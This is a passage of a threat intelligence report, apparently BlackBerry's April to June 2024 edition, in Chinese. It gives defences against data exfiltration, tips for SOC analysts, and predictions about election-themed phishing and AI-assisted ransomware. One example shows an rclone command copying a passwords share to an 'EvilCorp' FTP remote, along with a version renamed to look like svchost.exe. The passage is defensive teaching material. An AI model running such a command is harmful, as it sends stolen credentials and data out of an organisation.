上述工具清单并不详尽,因为用于外渗目的的工具有很多变种。因此,组织必须制定策略,防范可能被用于恶意目的的工具的使用。
这些战略可能包括
- 数据丢失防护(DLP)工具,用于检测和防止敏感数据因泄露、未经授权的使用或外流而丢失、滥用或共享。
- 静态和传输中加密
- 访问控制。
- "最低权限 "设置。只提供所需的访问权限。
- 定期审核账户--例如,如果用户改变了角色,他们可能会访问他们不再需要的数据。
- 网络分段,因为在发生入侵时,定义明确的网络分段会阻碍横向移动,减少攻击面。
- 入侵检测系统,用于监控网络流量。
- 采用默认拒绝方法--只在需要时启用。例如
- 阻止使用 USB 端口或云存储服务。(例如,使用组策略对象 (GPO) 禁用 USB 端口的数据传输)。
- 端口不应公开暴露在互联网上(例如,端口 22(SSH)不应向互联网开放)。
- 通过限制端口、协议和服务的使用来降低整体风险。
- 监控出站流量模式,例如
- 正常运营时间以外的交通流量增加(偏离正常基线)。
- 端口 22 上的出站流量突然增加可能表明有人使用 pscp.exe 等工具进行了外泄。
- 如上所述,22 等端口应采用默认拒绝方法来防止此类风险。
- 设置控制措施,监控已禁用端口或服务的出站尝试。
- 例如,如果威胁行为者进入网络并试图启用这些端口或服务,那么这些控制措施就会向安全团队发出警报。
从 SOC 分析师的角度来看,以下是分析师应该注意的一些例子:
工具重命名
分析人员需要了解常用的外渗工具及其选项和参数。以 Rclone 为例--"rclone.exe copy "\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10"--威胁行为者可能会将其重命名为更无害的名称,如--"svchost.exe copy "\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10"。
数据传输量
如果出现大量数据传输或向外流量突然增加的情况,分析人员应进行调查,特别是如果传输发生在核心业务时间之外。
异常流量
警惕来自未知 IP 或主机的意外数据传输模式。
用户行为分析
注意偏离常规的模式,如用户访问通常不需要访问的文件。例如,营销团队成员的主机访问客户财务记录。
结论和预测
本 90 天报告涵盖 2024 年 4 月至 6 月,旨在帮助您随时了解未来威胁并做好准备。备受瞩目的犯罪团伙,尤其是勒索软件运营商,正在利用新的漏洞,在大小目标中寻找价值。正如报告所指出的,BlackBerry 研究人员观察到平均每天捕获超过 11,500 个独特的恶意软件哈希值。如此频繁的活动使得了解行业和地区的最新安全新闻变得至关重要。
鉴于当前的网络威胁状况,我们预测未来几个月将面临以下威胁:
选举干扰
在全球范围内,2024 年是选举的重要一年,因为预计全球约 60% 的人口将参加投票。在这一年中,已经出现了误导、 虚假信息和干扰企图,包括通过相对较新的深度伪造媒介进行威胁。恶意行为者正越来越多地试图抓住时机制造混乱、煽动社会分裂并造成破坏。我们预测,他们将加强传播假新闻和错误信息的活动,并随着每次选举的临近而不断升级。
带有政治色彩的网络钓鱼诱饵
滥用带有政治色彩的帖子、论坛和邮件列表来传播恶意软件可能很快会成为一种武器化策略。通过利用各种政治圈子的两极分化观点,威胁行为者可能会利用这种混乱局面来传播感染了木马的政治资料,从而部署更多的恶意软件。常见的策略包括在社交媒体上发布虚假信息,并在社交媒体平台、即时通讯工具和传统新闻媒体上产生数百万次点击、浏览和参与。许多威胁行为者可能会利用这些社交媒体活动作为进行恶意软件攻击的诱饵。
混乱的武器化
在网络安全领域,任何类型的混乱都是恶意行为者利用混乱和错误信息的沃土。无论是战争、自然灾害、IT 中断,还是正常通信和数据流的任何重大中断,不稳定时期都为网络犯罪分子提供了大量机会。威胁行为者准备通过传播虚假的网络钓鱼电子邮件、误导性的论坛帖子以及伪装成有用的、与上下文相关的工具的恶意软件,不断利用这种情况。
勒索软件的演变与人工智能
面对全球执法部门、立法者和安全专业人员日益严格的审查,勒索软件 威胁行为者很可能会不断改进其战术、技术和程序(TTP),以继续开展业务。
这种演变可能涉及利用人工智能(特别是生成式人工智能)开发更复杂、更强大的有效载荷和执行链,利用深度伪造技术进行高级和有针对性的社会工程学攻击,分散和匿名化网络和 C2 基础设施以逃避跟踪和关闭,以及提高操作安全性。
访问BlackBerry 博客,了解网络安全威胁和防御的最新动态。
致谢
本报告凝聚了我们优秀团队和个人的共同努力。我们要特别感谢
- 阿德里安-钱伯斯
- 艾伦-麦卡锡
- 亚历山德拉-莫兹尔
- 阿马尔坎特-拉文德兰
- 安妮-卡门-迪特尔
- 丹尼尔-科里
- Dean Given
- 杰夫-奥鲁克
- 约翰-德布尔
- 伊斯梅尔-巴伦苏埃拉-埃斯佩霍
- 玛丽斯特拉-埃姆斯
- Natalia Ciapponi
- 娜塔莎-罗纳
- 罗纳德-韦尔奇
- 萨穆埃尔-里奥斯
- 特拉维斯-霍克斯梅尔
- 威廉-约翰逊
我们还要感谢加拿大皇家骑警国家网络犯罪协调中心的贡献与合作。